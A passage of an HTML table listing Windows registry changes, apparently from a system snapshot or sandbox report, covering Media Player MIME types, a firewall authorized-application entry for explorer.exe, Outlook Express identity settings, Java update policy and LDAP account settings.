<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg2a</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf-plugin</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wm</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmv</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wvx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-msvideo</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mms</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmst</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmsu</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\msbd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19</span></td>
<td><span style="color: black; font-size: xx-small;">RefCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control</span></td>
<td><span style="color: black; font-size: xx-small;">ActiveService</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"RasMan"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control</span></td>
<td><span style="color: black; font-size: xx-small;">ActiveService</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"TapiSrv"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch</span></td>
<td><span style="color: black; font-size: xx-small;">Epoch</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000009</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000000c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">VerStamp</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpellDontIgnoreDBCS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">MSIMN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">StoreMigratedV5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">ConvertedToDBX</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Settings Upgraded</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Running</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Store Root</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerDlgPos</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerTack</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Compact Check Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Welcome Message</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Secure Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Default_CodePage</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00006faf</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td><span style="color: black; font-size: xx-small;">BalloonShown</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateBeginTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:08 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateFinishTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">VersionXmlURL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateSchedule</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000011</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateScheduleMinutes</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000001a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">Frequency</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000020</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateInvokedTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"java.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Default LDAP Account</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory GC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVer</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVerNTDS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">ConnectionSettingsMigrated</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">AssociatedID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Bind DN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Port</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000cc4</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Resolve Flag</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Secure Connection</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP User Name</span></td>
<td></td>
